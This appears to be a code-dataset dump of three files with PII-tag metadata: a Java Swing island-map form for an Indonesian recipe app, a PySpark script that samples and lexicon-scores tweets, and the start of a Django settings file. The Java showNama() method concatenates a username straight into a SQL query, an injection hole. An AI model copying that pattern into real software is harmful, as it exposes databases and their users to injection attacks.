[{"tag": "EMAIL", "value": "david@reciprocitylabs.com", "start": 172, "end": 197, "context": "nses/LICENSE-2.0 <see LICENSE file>\n# Created By: david@reciprocitylabs.com\n# Maintained By: david@reciprocitylabs.com\n\nimpor"}, {"tag": "EMAIL", "value": "david@reciprocitylabs.com", "start": 215, "end": 240, "context": "ed By: david@reciprocitylabs.com\n# Maintained By: david@reciprocitylabs.com\n\nimport re\nfrom sqlalchemy.orm import validates\n\n"}]
|
/*
* Muhammad Faisal Amir
* f.miir117@gmail.com
* id.amirisback.bandung
* Copyright 2017
*/
package dnb;
import java.awt.Color;
import java.awt.Graphics2D;
import java.awt.image.BufferedImage;
import java.io.File;
import javax.imageio.ImageIO;
import javax.swing.ImageIcon;
/**
*
* @author Faisal Amir
*/
public class daerah extends javax.swing.JFrame {
connection conn = new connection();
private String sql = "";
private String id_pulau = "";
private int lebar, tinggi;
private Object get_username;
/**
* Creates new form index
*/
public daerah(Object get_username) {
this.get_username=get_username;
initComponents();
conn.ConnectToDB();
resizeImage();
showNama();
}
private daerah(){
}
public void showNama(){
try {
sql = "Select * From data_akun where username = '"+get_username+"'";
conn.setStatement(conn.getConnect().createStatement());
conn.setResultSet(conn.getStatement().executeQuery(sql));
while (conn.getResultSet().next()){
txt_nama.setText(conn.getResultSet().getString("nama"));
}
} catch (Exception e) {
}
}
public void resizeImage(){
try {
File foto = new File("../dnb/src/dnb/Icon/peta.png");
BufferedImage imgUkuranAsli = ImageIO.read(foto);
lebar = panel_gambar.getWidth();
tinggi = panel_gambar.getHeight();
BufferedImage imgResize = new BufferedImage(lebar, tinggi, BufferedImage.TYPE_INT_ARGB);
Graphics2D imgTampil = imgResize.createGraphics();
imgTampil.drawImage(imgUkuranAsli, 0, 0, lebar, tinggi, null);
imgTampil.dispose();
ImageIcon ImgOut = new ImageIcon(imgResize);
gambar.setText("");
gambar.setIcon(ImgOut);
} catch (Exception e) {
System.out.println(e);
}
}
/**
* This method is called from within the constructor to initialize the form.
* WARNING: Do NOT modify this code. The content of this method is always
* regenerated by the Form Editor.
*/
@SuppressWarnings("unchecked")
// <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents
private void initComponents() {
jLabel4 = new javax.swing.JLabel();
jPanel1 = new javax.swing.JPanel();
jLabel2 = new javax.swing.JLabel();
jLabel3 = new javax.swing.JLabel();
jPanel3 = new javax.swing.JPanel();
panel_gambar = new javax.swing.JPanel();
btn_jawa = new javax.swing.JLabel();
btn_sumatra = new javax.swing.JLabel();
btn_papua = new javax.swing.JLabel();
btn_nusatenggara = new javax.swing.JLabel();
btn_kalimantan = new javax.swing.JLabel();
btn_sulawesi = new javax.swing.JLabel();
btn_bali = new javax.swing.JLabel();
gambar = new javax.swing.JLabel();
Halo = new javax.swing.JLabel();
txt_nama = new javax.swing.JLabel();
Halo1 = new javax.swing.JLabel();
jLabel4.setText("jLabel4");
setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);
jPanel1.setBackground(new java.awt.Color(255, 204, 153));
jLabel2.setFont(new java.awt.Font("Segoe Script", 3, 36)); // NOI18N
jLabel2.setText("Dapur Nusantara Bunda");
jLabel3.setText("Copyright || Dapur Nusantara Bunda 2017");
jPanel3.setBackground(new java.awt.Color(255, 248, 206));
panel_gambar.setLayout(new org.netbeans.lib.awtextra.AbsoluteLayout());
btn_jawa.setFont(new java.awt.Font("Arial", 1, 36)); // NOI18N
btn_jawa.setForeground(new java.awt.Color(255, 0, 0));
btn_jawa.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
btn_jawa.setText("X");
btn_jawa.addMouseListener(new java.awt.event.MouseAdapter() {
public void mouseClicked(java.awt.event.MouseEvent evt) {
btn_jawaMouseClicked(evt);
}
});
panel_gambar.add(btn_jawa, new org.netbeans.lib.awtextra.AbsoluteConstraints(230, 280, -1, 40));
btn_sumatra.setFont(new java.awt.Font("Arial", 1, 36)); // NOI18N
btn_sumatra.setForeground(new java.awt.Color(255, 0, 0));
btn_sumatra.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
btn_sumatra.setText("X");
btn_sumatra.addMouseListener(new java.awt.event.MouseAdapter() {
public void mouseClicked(java.awt.event.MouseEvent evt) {
btn_sumatraMouseClicked(evt);
}
});
panel_gambar.add(btn_sumatra, new org.netbeans.lib.awtextra.AbsoluteConstraints(110, 140, -1, 40));
btn_papua.setFont(new java.awt.Font("Arial", 1, 36)); // NOI18N
btn_papua.setForeground(new java.awt.Color(255, 0, 0));
btn_papua.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
btn_papua.setText("X");
btn_papua.addMouseListener(new java.awt.event.MouseAdapter() {
public void mouseClicked(java.awt.event.MouseEvent evt) {
btn_papuaMouseClicked(evt);
}
});
panel_gambar.add(btn_papua, new org.netbeans.lib.awtextra.AbsoluteConstraints(790, 200, -1, 40));
btn_nusatenggara.setFont(new java.awt.Font("Arial", 1, 36)); // NOI18N
btn_nusatenggara.setForeground(new java.awt.Color(255, 0, 0));
btn_nusatenggara.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
btn_nusatenggara.setText("X");
btn_nusatenggara.addMouseListener(new java.awt.event.MouseAdapter() {
public void mouseClicked(java.awt.event.MouseEvent evt) {
btn_nusatenggaraMouseClicked(evt);
}
});
panel_gambar.add(btn_nusatenggara, new org.netbeans.lib.awtextra.AbsoluteConstraints(540, 320, -1, 40));
btn_kalimantan.setFont(new java.awt.Font("Arial", 1, 36)); // NOI18N
btn_kalimantan.setForeground(new java.awt.Color(255, 0, 0));
btn_kalimantan.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
btn_kalimantan.setText("X");
btn_kalimantan.addMouseListener(new java.awt.event.MouseAdapter() {
public void mouseClicked(java.awt.event.MouseEvent evt) {
btn_kalimantanMouseClicked(evt);
}
});
panel_gambar.add(btn_kalimantan, new org.netbeans.lib.awtextra.AbsoluteConstraints(340, 130, -1, 40));
btn_sulawesi.setFont(new java.awt.Font("Arial", 1, 36)); // NOI18N
btn_sulawesi.setForeground(new java.awt.Color(255, 0, 0));
btn_sulawesi.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
btn_sulawesi.setText("X");
btn_sulawesi.addMouseListener(new java.awt.event.MouseAdapter() {
public void mouseClicked(java.awt.event.MouseEvent evt) {
btn_sulawesiMouseClicked(evt);
}
});
panel_gambar.add(btn_sulawesi, new org.netbeans.lib.awtextra.AbsoluteConstraints(470, 170, -1, 40));
btn_bali.setFont(new java.awt.Font("Arial", 1, 36)); // NOI18N
btn_bali.setForeground(new java.awt.Color(255, 0, 0));
btn_bali.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
btn_bali.setText("X");
btn_bali.addMouseListener(new java.awt.event.MouseAdapter() {
public void mouseClicked(java.awt.event.MouseEvent evt) {
btn_baliMouseClicked(evt);
}
});
panel_gambar.add(btn_bali, new org.netbeans.lib.awtextra.AbsoluteConstraints(360, 310, -1, 40));
gambar.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
gambar.setText("jLabel1");
panel_gambar.add(gambar, new org.netbeans.lib.awtextra.AbsoluteConstraints(0, 0, 873, 377));
Halo.setFont(new java.awt.Font("Arial", 2, 14)); // NOI18N
Halo.setText("Halo,");
txt_nama.setFont(new java.awt.Font("Arial", 2, 14)); // NOI18N
txt_nama.setText("Nama");
Halo1.setFont(new java.awt.Font("Arial", 2, 14)); // NOI18N
Halo1.setText("|| Silahkan Memilih Pulau");
javax.swing.GroupLayout jPanel3Layout = new javax.swing.GroupLayout(jPanel3);
jPanel3.setLayout(jPanel3Layout);
jPanel3Layout.setHorizontalGroup(
jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(panel_gambar, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
.addGroup(jPanel3Layout.createSequentialGroup()
.addGap(14, 14, 14)
.addComponent(Halo)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
.addComponent(txt_nama, javax.swing.GroupLayout.PREFERRED_SIZE, 174, javax.swing.GroupLayout.PREFERRED_SIZE)
.addGap(51, 51, 51)
.addComponent(Halo1, javax.swing.GroupLayout.PREFERRED_SIZE, 182, javax.swing.GroupLayout.PREFERRED_SIZE)
.addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
);
jPanel3Layout.setVerticalGroup(
jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel3Layout.createSequentialGroup()
.addGap(18, 18, 18)
.addGroup(jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
.addComponent(Halo)
.addComponent(txt_nama))
.addComponent(Halo1))
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
.addComponent(panel_gambar, javax.swing.GroupLayout.DEFAULT_SIZE, 406, Short.MAX_VALUE))
);
javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
jPanel1.setLayout(jPanel1Layout);
jPanel1Layout.setHorizontalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel1Layout.createSequentialGroup()
.addGap(0, 0, Short.MAX_VALUE)
.addComponent(jLabel3))
.addComponent(jPanel3, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
.addContainerGap())
.addGroup(jPanel1Layout.createSequentialGroup()
.addGap(36, 36, 36)
.addComponent(jLabel2, javax.swing.GroupLayout.PREFERRED_SIZE, 495, javax.swing.GroupLayout.PREFERRED_SIZE)
.addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
);
jPanel1Layout.setVerticalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addGap(6, 6, 6)
.addComponent(jLabel2, javax.swing.GroupLayout.PREFERRED_SIZE, 51, javax.swing.GroupLayout.PREFERRED_SIZE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
.addComponent(jPanel3, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jLabel3)
.addContainerGap())
);
javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
getContentPane().setLayout(layout);
layout.setHorizontalGroup(
layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
);
layout.setVerticalGroup(
layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
);
pack();
setLocationRelativeTo(null);
}// </editor-fold>//GEN-END:initComponents
private void btn_sumatraMouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_sumatraMouseClicked
// TODO add your handling code here:
id_pulau = "IDP_SUMATRA";
list_masakan_user lsu = new list_masakan_user(id_pulau);
lsu.setVisible(true);
this.dispose();
}//GEN-LAST:event_btn_sumatraMouseClicked
private void btn_kalimantanMouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_kalimantanMouseClicked
// TODO add your handling code here:
id_pulau = "IDP_KALIMANTAN";
list_masakan_user lsu = new list_masakan_user(id_pulau);
lsu.setVisible(true);
this.dispose();
}//GEN-LAST:event_btn_kalimantanMouseClicked
private void btn_jawaMouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_jawaMouseClicked
// TODO add your handling code here:
id_pulau = "IDP_JAWA";
list_masakan_user lsu = new list_masakan_user(id_pulau);
lsu.setVisible(true);
this.dispose();
}//GEN-LAST:event_btn_jawaMouseClicked
private void btn_sulawesiMouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_sulawesiMouseClicked
// TODO add your handling code here:
id_pulau = "IDP_SULAWESI";
list_masakan_user lsu = new list_masakan_user(id_pulau);
lsu.setVisible(true);
this.dispose();
}//GEN-LAST:event_btn_sulawesiMouseClicked
private void btn_papuaMouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_papuaMouseClicked
// TODO add your handling code here:
id_pulau = "IDP_PAPUA";
list_masakan_user lsu = new list_masakan_user(id_pulau);
lsu.setVisible(true);
this.dispose();
}//GEN-LAST:event_btn_papuaMouseClicked
private void btn_nusatenggaraMouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_nusatenggaraMouseClicked
// TODO add your handling code here:
id_pulau = "IDP_NT";
list_masakan_user lsu = new list_masakan_user(id_pulau);
lsu.setVisible(true);
this.dispose();
}//GEN-LAST:event_btn_nusatenggaraMouseClicked
private void btn_baliMouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_baliMouseClicked
// TODO add your handling code here:
id_pulau = "IDP_BALI";
list_masakan_user lsu = new list_masakan_user(id_pulau);
lsu.setVisible(true);
this.dispose();
}//GEN-LAST:event_btn_baliMouseClicked
/**
* @param args the command line arguments
*/
public static void main(String args[]) {
/* Set the Nimbus look and feel */
//<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) ">
/* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.
* For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html
*/
try {
for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {
if ("Nimbus".equals(info.getName())) {
javax.swing.UIManager.setLookAndFeel(info.getClassName());
break;
}
}
} catch (ClassNotFoundException ex) {
java.util.logging.Logger.getLogger(daerah.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
} catch (InstantiationException ex) {
java.util.logging.Logger.getLogger(daerah.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
} catch (IllegalAccessException ex) {
java.util.logging.Logger.getLogger(daerah.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
} catch (javax.swing.UnsupportedLookAndFeelException ex) {
java.util.logging.Logger.getLogger(daerah.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
}
//</editor-fold>
//</editor-fold>
//</editor-fold>
//</editor-fold>
/* Create and display the form */
java.awt.EventQueue.invokeLater(new Runnable() {
public void run() {
new daerah().setVisible(true);
}
});
}
// Variables declaration - do not modify//GEN-BEGIN:variables
private javax.swing.JLabel Halo;
private javax.swing.JLabel Halo1;
private javax.swing.JLabel btn_bali;
private javax.swing.JLabel btn_jawa;
private javax.swing.JLabel btn_kalimantan;
private javax.swing.JLabel btn_nusatenggara;
private javax.swing.JLabel btn_papua;
private javax.swing.JLabel btn_sulawesi;
private javax.swing.JLabel btn_sumatra;
private javax.swing.JLabel gambar;
private javax.swing.JLabel jLabel2;
private javax.swing.JLabel jLabel3;
private javax.swing.JLabel jLabel4;
private javax.swing.JPanel jPanel1;
private javax.swing.JPanel jPanel3;
private javax.swing.JPanel panel_gambar;
private javax.swing.JLabel txt_nama;
// End of variables declaration//GEN-END:variables
}
|
Java
|
Apache-2.0
|
amirisback/Desktop-Java-ResepMasakan/src/dnb/daerah.java
|
3220129e-fef1-49f6-96bf-b3ab06da0f01
|
[{"tag": "EMAIL", "value": "f.miir117@gmail.com", "start": 30, "end": 49, "context": "/*\n * Muhammad Faisal Amir\n * f.miir117@gmail.com\n * id.amirisback.bandung\n * Copyright 2017\n */\npa"}, {"tag": "NAME", "value": "Faisal Amir", "start": 299, "end": 310, "context": "\nimport javax.swing.ImageIcon;\n\n/**\n *\n * @author Faisal Amir\n */\npublic class daerah extends javax.swing.JFram"}, {"tag": "NAME", "value": "Muhammad Faisal Amir", "start": 6, "end": 26, "context": "/*\n * Muhammad Faisal Amir\n * f.miir117@gmail.com\n * id.amirisback.bandung\n "}]
|
[{"tag": "EMAIL", "value": "f.miir117@gmail.com", "start": 30, "end": 49, "context": "/*\n * Muhammad Faisal Amir\n * f.miir117@gmail.com\n * id.amirisback.bandung\n * Copyright 2017\n */\npa"}, {"tag": "NAME", "value": "Faisal Amir", "start": 299, "end": 310, "context": "\nimport javax.swing.ImageIcon;\n\n/**\n *\n * @author Faisal Amir\n */\npublic class daerah extends javax.swing.JFram"}, {"tag": "NAME", "value": "Muhammad Faisal Amir", "start": 6, "end": 26, "context": "/*\n * Muhammad Faisal Amir\n * f.miir117@gmail.com\n * id.amirisback.bandung\n "}]
|
import sys
import json
import hashlib
import gc
from operator import *
import shlex
from pyspark import StorageLevel
from pyspark.sql import SQLContext
from pyspark.sql.functions import *
from pyspark.sql.types import *
import numpy as np
from subjectivity_clues import clues
def expect(name, var, expected, op=eq):
if op(var, expected):
log('[checkpoint] {} = {}'.format(name, expected))
else:
log('[error] {} = {}'.format(name, expected))
raise Exception(name)
def log(message):
log_file = 'sample_subjectivity_tweets.log'
with open(log_file, 'a') as f:
f.write(message)
f.write('\n')
f.flush()
f.close()
print message
def to_json(name, jsons):
filename = '{}.json'.format(name)
with open(filename, 'w') as f:
for j in jsons:
f.write(j)
f.write('\n')
def to_csv(name, jsons):
filename = '{}.csv'.format(name)
with open(filename, 'w') as f:
for tweet in jsons:
t = json.loads(tweet)
body = t['body'].replace('\n', ' ').replace('\r', '').replace('"', '""')
f.write('"{}",{},{},"{}"\n'.format(t['id'], t['verb'], t['postedTime'], body))
def sample(rdd, size, seed):
items = rdd.collect()
rand = np.random.RandomState(seed)
sampled = rand.choice(items, size=size, replace=False)
expect('sampled', len(set(sampled)), size)
return sampled.tolist()
def sha(name, ext='json'):
BUF_SIZE = 65536
filename = '{}.{}'.format(name, ext)
sha1 = hashlib.sha1()
with open(filename, 'rb') as f:
while True:
data = f.read(BUF_SIZE)
if not data:
break
sha1.update(data)
return sha1.hexdigest()
def read_and_parse_clues():
DEFAULT_FILENAME = os.getcwd() + os.sep + 'subjectivity_clues' + os.sep + 'subjclueslen1-HLTEMNLP05.tff'
lines = None
with open(DEFAULT_FILENAME, 'r') as f:
lines = f.readlines()
clues = dict()
for l in lines:
clue = dict(token.split('=') for token in shlex.split(l))
word = clue['word1']
clues[word] = clue
return clues
def calculate_relevant(lexicons, sentence):
PRIORPOLARITY = {
'positive': 1,
'negative': -1,
'both': 0,
'neutral': 0
}
TYPE = {
'strongsubj': 2,
'weaksubj': 1
}
total_score = 0
for w in sentence.split(' '):
if w not in lexicons.keys():
continue
total_score += PRIORPOLARITY[lexicons[w]['priorpolarity']] * TYPE[lexicons[w]['type']]
return total_score
# Make sure Python uses UTF-8 as tweets contains emoticon and unicode
reload(sys)
sys.setdefaultencoding('utf-8')
# Use SQLContext for better support
sqlContext = SQLContext(sc)
# Define storage level
DISK_ONLY_2 = StorageLevel(True, False, False, False, 2)
MEMORY_AND_DISK = StorageLevel(True, True, False, False, 1)
# Read GNIP's JSON file
directory = "tweets"
datasets = sqlContext.read.json(directory)
log('# Completed reading JSON files')
# Check checksum count
file_count = datasets.where(datasets['verb'].isNull()).count()
expect('file_count', file_count, 21888)
# Check post count
all_posts = datasets.where(datasets['verb'] == 'post')
all_posts_count = all_posts.count()
expect('all_posts_count', all_posts_count, 1570398)
# Check share count
all_shares = datasets.where(datasets['verb'] == 'share')
all_shares_count = all_shares.count()
expect('all_shares_count', all_shares_count, 1112590)
# Check dataset count
info_dataset = datasets.select('info')
info_dataset.registerTempTable('info')
all_tweets_count = info_dataset.select('info.activity_count').groupBy().sum('activity_count').collect()[0][0]
expect('all_tweets_count', all_tweets_count, 2682988)
expect('all_tweets_count', all_tweets_count, all_posts_count + all_shares_count)
log('# Completed validating tweets count')
# Remove post authored by @ChipotleTweet and news agencies
chipotle_tweet = 'id:twitter.com:141341662'
users_to_remove = [chipotle_tweet, 'id:twitter.com:759251', 'id:twitter.com:91478624', 'id:twitter.com:28785486',
'id:twitter.com:1652541', 'id:twitter.com:51241574', 'id:twitter.com:807095',
'id:twitter.com:34713362', 'id:twitter.com:3090733766', 'id:twitter.com:1367531',
'id:twitter.com:14293310', 'id:twitter.com:3108351', 'id:twitter.com:14173315',
'id:twitter.com:292777349', 'id:twitter.com:428333', 'id:twitter.com:624413',
'id:twitter.com:20562637', 'id:twitter.com:13918492', 'id:twitter.com:16184358',
'id:twitter.com:625697849', 'id:twitter.com:2467791', 'id:twitter.com:9763482',
'id:twitter.com:14511951', 'id:twitter.com:6017542', 'id:twitter.com:26574283',
'id:twitter.com:115754870']
all_posts_wo_specific_users = all_posts.where(~ col('actor.id').isin(users_to_remove))
all_posts_w_specific_users = all_posts.where(col('actor.id').isin(users_to_remove)).count()
expect('all_posts_wo_specific_users', all_posts_wo_specific_users.count(), all_posts_count - all_posts_w_specific_users)
# Remove share retweet of tweet by @ChipotleTweet and news agencies
all_shares_wo_specific_users = all_shares.where(~ col('object.actor.id').isin(users_to_remove))
all_shares_w_specific_users = all_shares.where(col('object.actor.id').isin(users_to_remove)).count()
expect('all_shares_wo_specific_users', all_shares_wo_specific_users.count(), all_shares_count - all_shares_w_specific_users)
# Generate tweets pool with only English tweet
tweets_pool = all_posts_wo_specific_users.unionAll(all_shares_wo_specific_users).filter("twitter_lang = 'en'")
tweets_pool.persist(MEMORY_AND_DISK)
tweets_pool_count = tweets_pool.count()
# Adding all post to all share will be greater than tweet pool because of non-English tweet
expected_tweets_pool_count = all_posts_count - all_posts_w_specific_users + \
all_shares_count - all_shares_w_specific_users
expect('tweets_pool_count', tweets_pool_count, expected_tweets_pool_count, op=lt)
log('# Completed constructing tweets pool')
# Check language of tweets
languages = tweets_pool.select('twitter_lang').distinct()
languages_count = languages.count()
language_check = languages.first()['twitter_lang']
expect('languages_count', languages_count, 1)
expect('language_check', language_check, 'en')
log('# Completed validating language variety')
# Take top 80% of tweets by length
tweets_pool_str_lengths = tweets_pool.select(length('body').alias('length')).rdd.map(lambda x: x.length).collect()
lengths_np = np.array(tweets_pool_str_lengths)
p = np.percentile(lengths_np, 20)
final_tweets_pool = tweets_pool.filter(length('body') >= p)
final_tweets_pool.persist(MEMORY_AND_DISK)
tweets_pool.unpersist(blocking=True)
final_tweets_pool_count = final_tweets_pool.count()
percentage_kept = float(final_tweets_pool_count) / tweets_pool_count
expect('percentage_kept', percentage_kept, 0.8, op=gt)
log('# Completed sampling top 80% of tweets by body length')
# Sampling
final_tweets_ids = final_tweets_pool.select(final_tweets_pool['id']).rdd.sortBy(lambda x: x.id).map(lambda x: x.id)
# Development tweets
dev_seed = 10102016
number_of_dev_samples = 3000
dev_posts = sample(final_tweets_ids, number_of_dev_samples, dev_seed)
dev_posts_count = len(dev_posts)
expect('dev_posts_count', dev_posts_count, number_of_dev_samples)
log('# Completed sampling dev tweets')
dev_posts_file = "dev_posts"
dev_posts_jsons = final_tweets_pool[final_tweets_pool['id'].isin(dev_posts)].toJSON().collect()
to_json(dev_posts_file, dev_posts_jsons)
to_csv(dev_posts_file, dev_posts_jsons)
expect('dev_posts_file', sha(dev_posts_file), '74447296831c8e3061fc0ee739f549c5b08b85a3')
expect('dev_posts_file', sha(dev_posts_file, ext='csv'), '6acfd1f8d238bc5d25d97d2c9e6f6b177699389a')
log('Exporting dev post to {}'.format(dev_posts_file))
log('# Completed exporting dev tweets')
del dev_posts_jsons
gc.collect()
# Find distinct set of tweets (unique body text)
post_pool = final_tweets_pool.where(final_tweets_pool['verb'] == 'post')
post_pool.persist(MEMORY_AND_DISK)
post_pool_ids = post_pool.select(post_pool['id']).rdd.sortBy(lambda x: x.id).map(lambda x: x.id).collect()
expect('post_pool', post_pool.count(), 1124935)
share_pool = final_tweets_pool.where(final_tweets_pool['verb'] == 'share')
share_pool.persist(MEMORY_AND_DISK)
expect('share_pool', share_pool.count(), 846141)
broadcast_post_ids = sc.broadcast(set(post_pool_ids))
unique_share_ids = share_pool.select(share_pool['id'], share_pool['object.id'].alias('object_id')).rdd.filter(lambda row: row['object_id'] not in broadcast_post_ids.value).map(lambda row: row.id).collect()
expect('unique_share_pool', len(unique_share_ids), 193006)
log('# Completed finding unique share tweet')
# Constructing distinct tweet pool
broadcast_unique_share_ids = sc.broadcast(unique_share_ids)
distinct_tweets_pool = final_tweets_pool.\
select(final_tweets_pool['id'], final_tweets_pool['body']).\
rdd.\
filter(lambda row: row['id'] in broadcast_post_ids.value or row['id'] in broadcast_unique_share_ids.value)
distinct_tweets_pool.persist(MEMORY_AND_DISK)
distinct_tweets_count = distinct_tweets_pool.count()
expect('distinct_tweets_pool', distinct_tweets_count, 1124935 + 193006)
# Exclude development tweets
tweets_unsampled = distinct_tweets_pool.toDF().where(~ col('id').isin(dev_posts))
tweets_unsampled.persist(MEMORY_AND_DISK)
tweets_unsampled_count = tweets_unsampled.count()
# no. of dev intersect post pool: 1718, no. of share dev intersect unique share pool: 293
expect('tweets_unsampled', tweets_unsampled_count, 1124935 + 193006 - 1718 - 293)
log('# Completed constructing unsampled tweets')
# Calculate subjectivity
lexicons = read_and_parse_clues()
udfBodyToRelevant = udf(lambda body: calculate_relevant(lexicons, body), IntegerType())
tweets_lexicon = tweets_unsampled.withColumn('score', udfBodyToRelevant('body'))
tweets_lexicon.persist(MEMORY_AND_DISK)
log('# Completed constructing tweet lexicon')
# Take top and bottom
number_of_tweets_each = 1500
positive_tweets = tweets_lexicon.orderBy(desc('score')).take(number_of_tweets_each)
negative_tweets = tweets_lexicon.orderBy(asc('score')).take(number_of_tweets_each)
# Cut top and bottom via score for more deterministic sampling
min_positive_score = positive_tweets[-1]['score']
min_negative_score = negative_tweets[-1]['score']
expect('min_positive_score', min_positive_score, 7)
expect('min_negative_score', min_negative_score, -5)
positive_tweets = tweets_lexicon.filter('score > {}'.format(min_positive_score - 1)).orderBy(desc('score')).collect()
expect('positive_tweets', len(positive_tweets), 2012)
negative_tweets = tweets_lexicon.filter('score < {}'.format(min_negative_score + 1)).orderBy(asc('score')).collect()
expect('positive_tweets', len(negative_tweets), 1715)
positive_tweet_file = "positive_tweets"
positive_tweets_ids = map(lambda t: t['id'], positive_tweets)
positive_tweet_jsons = final_tweets_pool[final_tweets_pool['id'].isin(positive_tweets_ids)].toJSON().collect()
to_json(positive_tweet_file, positive_tweet_jsons)
to_csv(positive_tweet_file, positive_tweet_jsons)
log('Exporting positive tweets to {}'.format(positive_tweet_file))
log('# Completed exporting positive tweets')
expect('positive_tweet_file', sha(positive_tweet_file), 'cb2f8b691ccf3eae9846c67735f413a49befea28')
expect('positive_tweet_file', sha(positive_tweet_file, ext='csv'), 'd3d43ab4e03fdf106b9191f4e0161cfcde3f040e')
negative_tweet_file = "negative_tweets"
negative_tweet_ids = map(lambda t: t['id'], negative_tweets)
negative_tweet_jsons = final_tweets_pool[final_tweets_pool['id'].isin(negative_tweet_ids)].toJSON().collect()
to_json(negative_tweet_file, negative_tweet_jsons)
to_csv(negative_tweet_file, negative_tweet_jsons)
log('Exporting negative tweets to {}'.format(negative_tweet_file))
log('# Completed exporting negative tweets')
expect('negative_tweet_file', sha(negative_tweet_file), '086c43427078092e538a779b8b06a71341b8da48')
expect('negative_tweet_file', sha(negative_tweet_file, ext='csv'), 'd10a1a95156c28d844e9c4e668d766963c0636a4')
|
Python
|
Apache-2.0
|
chuajiesheng/twitter-sentiment-analysis/step_2/scripts/sample_subjectivity_tweets.py
|
e29700da-4299-4fad-80ee-8aef627bda02
|
[{"tag": "USERNAME", "value": "@ChipotleTweet", "start": 5225, "end": 5239, "context": "ecific_users)\n\n# Remove share retweet of tweet by @ChipotleTweet and news agencies\nall_shares_wo_specific_users = "}, {"tag": "USERNAME", "value": "@ChipotleTweet", "start": 3958, "end": 3972, "context": "idating tweets count')\n\n# Remove post authored by @ChipotleTweet and news agencies\nchipotle_tweet = 'id:twitter.co"}]
|
[{"tag": "USERNAME", "value": "@ChipotleTweet", "start": 5225, "end": 5239, "context": "ecific_users)\n\n# Remove share retweet of tweet by @ChipotleTweet and news agencies\nall_shares_wo_specific_users = "}, {"tag": "USERNAME", "value": "@ChipotleTweet", "start": 3958, "end": 3972, "context": "idating tweets count')\n\n# Remove post authored by @ChipotleTweet and news agencies\nchipotle_tweet = 'id:twitter.co"}]
|
"""
Django settings for hiren project.
Generated by 'django-admin startproject' using Django 1.8.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import json
from celery.schedules import crontab
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# load json file baby :D
try:
with open('config.json') as f:
JSON_DATA = json.load(f)
except FileNotFoundError:
with open('config.sample.json') as f:
JSON_DATA = json.load(f)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('SECRET_KEY', JSON_DATA['secret_key'])
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = os.environ.get('DEBUG', False)
